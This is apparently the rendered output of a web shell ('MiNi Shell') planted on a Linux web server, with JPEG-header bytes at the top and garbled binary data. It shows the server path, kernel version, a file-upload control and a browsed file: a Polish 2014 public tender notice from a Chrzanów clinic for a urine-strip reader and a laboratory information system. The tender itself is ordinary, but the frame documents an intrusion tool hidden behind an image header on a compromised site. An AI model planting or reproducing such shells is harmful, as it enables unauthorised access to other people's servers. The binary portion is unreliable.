JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140114/14974-N-2014.html

<p class="kh_header"><b>Chrzanów: Dzierżawa czytnika pasków diagnostycznych do moczu z dostawą pasków testowych oraz dzierżawa laboratoryjnego systemu informatycznego - LIS</b><br>
<b>Numer ogłoszenia: 14974 - 2014; data zamieszczenia: 14.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Lecznictwa Ambulatoryjnego w Chrzanowie Sp. z o.o. , ul. Sokoła 19, 32-500 Chrzanów, woj. małopolskie, tel. 32 6240325, faks 32 6240310.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zla-chrzanow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dzierżawa czytnika pasków diagnostycznych do moczu z dostawą pasków testowych oraz dzierżawa laboratoryjnego systemu informatycznego - LIS.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I.Dzierżawa czytnika pasków diagnostycznych do moczu wraz z oprogramowaniem komputerowym na okres 36 miesięcy:
Lp	Parametry wymagane 
1	Czytnik pasków do moczu nie starszy niż rok produkcji 2011 przeznaczony do analizy następujących parametrów fiz-chem. badania ogólnego moczu: glukoza, białko, bilirubina, ciała ketonowe, urobilinogen, azotyny, leukocyty, erytrocyty, pH, ciężar właściwy, barwa moczu
2	Wyposażony w dotykowy ekran ciekłokrystaliczny , komputer, klawiaturę , wewnętrzną i zewnętrzną drukarkę , czytnik kodów paskowych ,UPS
3	Czytnik posiada oprogramowanie umożliwiające dokumentację i archiwizację wyników badań z testów paskowych , badań mikroskopowych osadu, badań kontrolnych
4	Czytnik posiada złącze do dwukierunkowej transmisji danych i komunikacji z zewnętrznym laboratoryjnym systemem informatycznym
5	Wydajność minimum 500 oznaczeń na godzinę 
6	Pamięć minimum 1000 wyników 
7	Kontrola pamięci - pamięć minimum 100 wyników
8	Automatyczne wykrywanie zabarwienia próbki przez analizator
9	Kompensacja własnego zabarwienia moczu
10	Możliwość wyboru barwy i klarowności moczu z aparatu 
11	Flagowanie wyników patologicznych
12	Możliwość tworzenia w aparacie raportów wyników wymagajacych weryfikacji
13	Możliwość dopisania wyniku osadu do wyniku w aparacie
14	Możliwość konfiguracji wydruku wyników badań 
15	Możliwość tworzenia list roboczych , raportów dziennych wyników 
16	Prezentacja wyników kontroli jakości z mozliwością wydruku raportów
17	Kalibracja przy użyciu pasków kalibracyjnych
18	Automatyczny start pasków testowych 
19	Automatyczne usuwanie zużytych pasków do pojemnika na odpady
20	Mozliwość wyboru jednostek pomiaru
21	Wewnątrzlaboratoryjna kontrola jakości za pomocą płynnych materiałów kontrolnych
22	Czytnik posiada znak CE 
23	Instrukcja obsługi czytnika w języku polskim
24	Wykonawca dostarczy czytnik , zamontuje , uruchomi oraz przeszkoli personel w zakresie obsługi w ciagu 3 tygodni od dnia podpisania umowy 
25	Wykonawca zapewni bezpłatne serwisowanie czytnika w trakcie trwania umowy ( przeglądy , naprawy, części zamienne , dojazd )
26	Czas reakcji serwisu na zgłoszenie awarii do 24 godzin a dokonanie naprawy do 48 godzin( dni robocze)
27	W przypadku braku możliwości naprawy w terminie 48 godzin , dostarczy aparat zastepczy
28	Wykonawca zapewni na swój koszt zewnętrzną międzynarodową kontrolę jakości RIQAS dla pasków testowych w cyklach zapewniajacych uzyskanie certyfikatu
29 	Wraz z pierwszą dostawą wykonawca dostarczy obowiązkową dokumentację dotyczącą czytnika : opis techniczny, instrukcja obsługi w języku polskim, metodyki badań, karty charakterystyki

II.Dostawa pasków testowych oraz materiałów kontrolnych do oferowanego czytnika potrzebnych do wykonania 21 000 badań ogólnych moczu rocznie (63 000 przez okres 36 miesiecy).
Wymagania dotyczące testów paskowych:
1.	Paski charakteryzują się eliminacją wpływu kwasu askorbinowego na wyniki glukozy.
2.	Wymagana czułość dla białka nie gorsza niż 20 mg/dl dla glukozy nie mniejsza niż 50 mg/dl.
3.	Paski, materiały kontrolne posiadaja znak CE oraz karty charakterystyki ( proszę dołączyć do oferty)
4.	Instrukcje metodyczne dla testów paskowych są w języku polskim i są dołączone do każdego opakowania.
5.	Dostawa odczynników odbywała się będzie zgodnie z okresowymi zamówieniami w czasie do 2 tygodni od dnia złożenia zamówienia.
Ważność dostarczanych odczynników - minimum 6 miesięcy licząc od daty dostawy .
Kontrola wewnątrzlaboratoryjna wykonywana jest codziennie na dwóch poziomach

Dzierżawa oprogramowania do Laboratoryjnego Systemu Informatycznego - LIS

Lp	Parametry
1	Oferent dostarczy w ramach dzierżawy niezbędne oprogramowanie, sprzęt komputerowy, monitory, drukarki do obsługi 6 stanowisk roboczych plus serwer , czytniki kodów kreskowych , czytnik kart zleceń , przeglądarkę do wyników
2	Oprogramowanie jest w języku polskim
3	Oferent zapewni bezpłatnie w ramach dzierżawy połączenie wspólnym serwerem analizatorów , wdrożenie oraz szkolenie z zakresu obsługi systemu
4	System powinien spinać w sieć oferowany czytnik do moczu oraz aparaty posiadane przez laboratorium : - COBAS Integra 400 firmy Roche ( biochemia)- COBAS e 411 firmy Roche ( immunologia)- COAG Chrom 3003 firmy BioKsel ( koagulologia )- SYSMEX 1000 i firmy Sysmex ( hematologia)- czytnik OB ESR 48 firmy Kabe 
5	System umożliwia manualne wpisywanie osadu moczu, wynik z oznaczenia elektrolitów ( Na, Cl, K ), rozmaz krwi, komentarz
6	Rejestracja pacjentów i zleceń możliwa manualnie i przy pomocy kodów kreskowych 
7	Rejestracja próbek za pomoca skanera do kart zleceń
8	System umożliwia autoryzację użytkowników oraz wyników 
9	Możliwość wprowadzenia podpisu elektronicznego wraz z modernizacją systemu
10	System umozliwia prowadzenie wewnątrzlaboratoryjnej kontroli jakości ( wykresy , SD, CV )wg zasad Westgarda
11	System umożliwia drukowanie wyników pojedynczo oraz zbiorowo
12	System posiada mozliwość prowadzenia kartotek zleceniodawców oraz pacjentów 
13	System posiada znakowanie matariału kodami kreskowymi umożliwiającymi jednoznaczną identyfikację próbki ze zleceniem
14	System posiada możliwość tworzenia archiwum
15	System umożliwia zarządzanie informacją ( tworzenie list roboczych, księgi głównej , sterowanie przepływem zleceń pomiędzy stanowiskami komputerowymi a analizatorami)
16	System umożliwia kontrolę procesu walidacji wyników ( wyświetla wartości referencyjne z uwzględnieniem wieku i płci , flaguje wyniki patologiczne )
17	Umożliwia prowadzenie delta Check pacjenta
18	Możliwość automatycznego obliczania testów obliczeniowych w oparciu o stosowane w diagnostyce laboratoryjnej wzory
19	System posiada możliwość konfigurowania wydruków wyników badań ( możliwość wpisywania i edycji następujących danych : nr zlecenia, kod zleconego badania, data i godzina pobrania, data rejestracji i wykonania badania, pesel, imię i nazwisko , data urodzenia , płeć , wiek oraz adres pacjenta, jednostka kierujaca , lekarz kierujący )
20	Mozliwość wykonywania obliczeń statystycznych liczby zleceń , badań, oznaczeń ogółem i dla poszczególnych kontrahentów 
21	Raportowanie ilości wykonanych badań w wybranym przedziale czasowym dla wybranego kontrahenta
22	System umozliwia obsługę rozliczeń finansowych z kontrahentami, zleceniodawcami , z pacjentami wykonujacymi badania odpłatne
23	System umożliwi elektroniczny dostęp innych użytkowników( lekarze ZLA ) do wyników badań laboratoryjnych z wykorzystaniem przeglądarki
24	Możliwość zabezpieczenia bazy danych przez cykliczne i automatyczne tworzenie kopii zapasowych systemu wraz z danymi laboratorium i osobowymi pacjenta ( minimum jeden niezależny nośnik elektroniczny)
25	Wykonawca zapewni bezpłatnie serwisowanie systemu przez cały okres użytkowania
26	Wdrożenie - czas wdrożenia max. 21 dni roboczych od dnia podpisania umowy
27	W przypadku zaoferowania innego oprogramowania niż dotychczas używane (PSM) w celu obsługi bazy archiwalnej oferent zapewni integralność danych archiwalnych z ostatnich 3 lat z dotychczas używanego oprogramowania analitycznego z zachowaniem ich dotychczasowej dostępności i funkcjonalności . Ewentualne przeniesienie bazy danych do innego oprogramowania musi nastapić jednorazowo przy zachowaniu ciągłości pracy laboratorium..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej  wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert -kserokopia potwierdzona przez wykonawcę za zgodność z oryginałem.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na potwierdzenie spełnienia warunków Wykonawca zobowiązany jest przedłożyć Oświadczenie w trybie art.22 ustawy -Prawo zamówień
publicznych , o spełnieniu warunków udziału w postępowaniu o których mowa w art.22 ustawy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na potwierdzenie spełnienia warunków Wykonawca zobowiązany jest przedłożyć Oświadczenie w trybie art.22 ustawy -Prawo zamówień
publicznych , o spełnieniu warunków udziału w postępowaniu o których mowa w art.22 ustawy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na potwierdzenie spełnienia warunków Wykonawca zobowiązany jest przedłożyć Oświadczenie w trybie art.22 ustawy -Prawo zamówień
publicznych , o spełnieniu warunków udziału w postępowaniu o których mowa w art.22 ustawy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na potwierdzenie spełnienia warunków Wykonawca zobowiązany jest przedłożyć Oświadczenie w trybie art.22 ustawy -Prawo zamówień
publicznych , o spełnieniu warunków udziału w postępowaniu o których mowa w art.22 ustawy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie Wykonawcy ,że dostarczane wyroby  posiadają Deklaracje 
 zgodności oraz oznakowanie CE lub inne dokumenty ważne dla danych wyrobów  (zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi )
Deklaracja zgodności musi zawierać informację o klasie i regule klasyfikacyjnej wyrobu. 
Jeżeli w ocenie zgodności brała udział jednostka notyfikowana ,należy podać dane jednostki. 
Dla wyrobów niesklasyfikowanych jako medyczne oświadczenie o stosownej treści.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zla-chrzanow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Lecznictwa Ambulatoryjnego Sp. z o.o. 32-500 Chrzanów ul.
Sokoła19 tel/fax. (32) 624 03 10.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.01.2014 godzina 10:00, miejsce: Zakład Lecznictwa Ambulatoryjnego Sp. z o.o. 32-500 Chrzanów ul.
Sokoła19 tel/fax. (32) 624 03 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com